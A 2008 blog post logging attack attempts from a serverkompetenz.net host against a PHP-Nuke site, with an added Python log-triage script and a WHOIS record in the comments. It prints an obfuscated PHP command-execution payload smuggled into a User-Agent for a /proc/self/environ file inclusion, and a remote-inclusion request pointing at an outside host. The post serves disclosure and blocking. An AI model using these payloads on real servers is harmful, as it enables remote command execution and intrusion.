Sep 11, 2008

serverkompetenz.net Hackers

The host at serverkompetenz.net is a hacker, not a spambot.

.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:
 $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");


81.169.152.101 h986442.serverkompetenz.net

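The bot attempted to inject a script in place of its user agent string. The k parameter walks up the directory tree to /proc/self/environ, where a CGI process exposes the request's User-Agent value, so a vulnerable include would run the injected PHP.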

It then tried to load a script from a remote server.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net
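A log triage check for the two requests above, as an added example that is not part of the original post: it resolves the octal and hex escapes in the User-Agent payload and flags the traversal to /proc/self/environ and the remote URL passed in k. The function names, finding labels and the shortened sample values are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# PHP functions that run OS commands; finding one in a header is a strong signal.
EXEC_FUNCS = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open"}
ESCAPE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3})")

# Constructed samples: the traversal is shortened and the User-Agent is an
# excerpt of the payload logged above.
SAMPLE_QUERY = "/../../../proc/self/environ"
SAMPLE_UA = (r'$x0e="\145x\x65\x63"; $x1b="\x73\x79s\x74e\x6d"; '
             r'echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");')

def php_unescape(s):
    """Resolve the \\xHH and \\NNN (octal) escapes of a PHP double-quoted string."""
    def sub(m):
        tok = m.group(1)
        code = int(tok[1:], 16) if tok[0] == "x" else int(tok, 8) & 0xFF
        return chr(code)
    return ESCAPE.sub(sub, s)

def decoded_literals(header):
    """Return every double-quoted literal in the header with escapes resolved."""
    return [php_unescape(lit) for lit in re.findall(r'"((?:[^"\\]|\\.)*)"', header)]

def classify(query_value, user_agent):
    """Return the set of findings for one request's include parameter and User-Agent."""
    findings = set()
    value = unquote(query_value)
    if "../" in value:
        findings.add("path-traversal")
    if "proc/self/environ" in value:
        findings.add("environ-include")
    if re.match(r"(?i)(https?|ftp)://", value):
        findings.add("remote-include")
    # Obfuscated names only show up after the escapes are resolved.
    if "<?" in user_agent or EXEC_FUNCS & set(decoded_literals(user_agent)):
        findings.add("code-in-user-agent")
    return findings

if __name__ == "__main__":
    print(decoded_literals(SAMPLE_UA))
    print(sorted(classify(SAMPLE_QUERY, SAMPLE_UA)))
```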

1 comment:

Anonymous said...

inetnum: 81.169.144.0 - 81.169.156.255
netname: STRATO-RZG-KA
descr: Strato Rechenzentrum, Berlin
country: DE
admin-c: CM265-RIPE
tech-c: XX1-RIPE
tech-c: WB14-RIPE
status: ASSIGNED PA
remarks: in case of spam, attacks from these addresses
remarks: please inform abuse@strato.de
mnt-by: STRATO-RZG-MNT
mnt-lower: STRATO-RZG-MNT
mnt-routes: STRATO-RZG-MNT
source: RIPE # Filtered

person: Christian Mueller
address: Cronon AG
address: Pascalstrasse 10
address: D-10587 Berlin
address: Germany
phone: +49 30 398020
fax-no: +49 30 39802222
abuse-mailbox: abuse@strato.de
nic-hdl: CM265-RIPE
remarks: see also: XX1-RIPE CM5081-NSI CM1-ABC SOUL-RIPE
mnt-by: CRONON-MNT
source: RIPE # Filtered

person: Christian Xaver Mueller
address: Cronon AG
address: Pascalstrasse 10
address: D-10587 Berlin
address: Germany
phone: +49 30 398020
fax-no: +49 30 39 802-222
abuse-mailbox: abuse@strato.de
nic-hdl: XX1-RIPE
remarks: see also: CM265-RIPE SOUL-RIPE
mnt-by: CRONON-MNT
source: RIPE # Filtered

person: Wilhelm Boeddinghaus
address: Strato Rechenzentrum GmbH
address: Pascalstrasse 10
address: D-10587 Berlin
address: Germany
phone: +49 30 39802-0
fax-no: +49 30 39802-222
nic-hdl: WB14-RIPE
remarks: see also INTERNIC: >WB131<
mnt-by: CRONON-MNT
source: RIPE # Filtered

% Information related to '81.169.128.0/18AS6724'

route: 81.169.128.0/18
descr: Strato Rechenzentrum
origin: AS6724
mnt-by: STRATO-RZG-MNT
source: RIPE # Filtered

% Information related to '81.169.144.0/20AS6724'

route: 81.169.144.0/20
descr: Strato Rechenzentrum
origin: AS6724
mnt-by: STRATO-RZG-MNT
source: RIPE # Filtered